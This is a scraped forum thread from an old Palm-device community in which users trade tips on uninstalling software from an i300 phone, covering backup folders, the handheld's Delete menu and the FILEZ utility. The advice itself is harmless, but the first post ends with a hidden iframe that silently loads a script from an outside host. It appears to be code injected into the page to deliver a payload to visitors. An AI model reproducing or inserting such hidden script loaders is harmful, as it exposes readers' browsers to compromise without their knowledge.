+ Reply to Thread

how to remove software?

How do you remove software installed through the install tool? The instructions say to click on the software you want to remove and click remove... but nothing I have installed WITH the install tool is listed there when I open install tool again.

I've done a cold reset of my i300 and set it back to factory specs but when i sync it with my pc all the software i've loaded in the past gets reloaded I can't stop it.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Napoleon Bonaparte Jr.

Hello

If you using Palm Desktop 4.0 :

1 go to MY COMPUTER
    2 click on LOCAL DISK
    3 click PALM icon
    4 click on the name "????" you gave to your phone
    5 click on BACKUP
    all programms there ... delete whatever you want

For Palm Desktop 4.1

1 go to MY COMPUTER
    2 go to LOCAL DISK
    3 go to PROGRAM FILES
    4 click PALM
    5 click "???" the name of your phone
    6 click BACKUP
    you got it !

Thanks for the help.

I tried that and resynced but it didn't remove the software. Am I to reset the phone now then sync up?

<pulling hair out>

I removed the programs I didn't want back on (I have 4.1 desktop) and they are loading back again after doing a cold reset!!!!!

Napoleon Bonaparte Jr.

hello

Simple Synchro ...

Remove thr programs in your comp , next restore your palm to fabric settings >>>>>>>>>>>> synchronize !

It cannot be anything else .

is this the only way? it's getting old resetting the phone just to remove one piece of software and then having to reload everything else I want to keep.

there are lots of software packages i would like to try out and of course most i don't want to keep... so there's no other way to selectively uninstall a piece of software ?

Administrator

Arrow

download FILEZ from palmgear.com. you can search for a thread on it here...
    Last edited by Marctronixx; 08-10-2002 at 11:51 AM.

Originally posted by Marctronixx
    download FILEZ from palmgear.com. you can search for a thread on it here...

ok.. thanks!
    Last edited by Marctronixx; 08-10-2002 at 11:51 AM.

Cool

Something I think that is being left out is the option to delete the program from the handheld directly.

To do this, tap the clock to get the pull-down menus. You will see under App, the Delete... option, tap it.

The handheld will bring up a list of all software installed. Select what you want, and tap Delete.

I think it should update the backup so that it doesn't just reinstall when you hot synch, but I'm not positive. If it doesn't, just delete the backup from the desktop as described in other posts in this thread.

Note: If you are using a GUI overlay like SilverScreen, you may need to exit it in order to get to the Delete option as described.

-John

Administrator

Arrow

that will delete the app but it may still leave left over stuff in the db. with filez you can see all of the programs in your phones brain and delete left over stuff and even change attributes if you wish. also, the app(hack) "uninstall" works well.

Notepad has disappeared, how do I add it back in

When I was looking at 4.1, I noticed that my note pad was not included on the unit. How do I add it back in.

I've tried reinstalling 4.1 but without success. Also tried uninstalling and reinstalling. It shows up on "custom" that it's synching but nothing is there.

Any help.

Reply to rfstuart8676@earthlink.net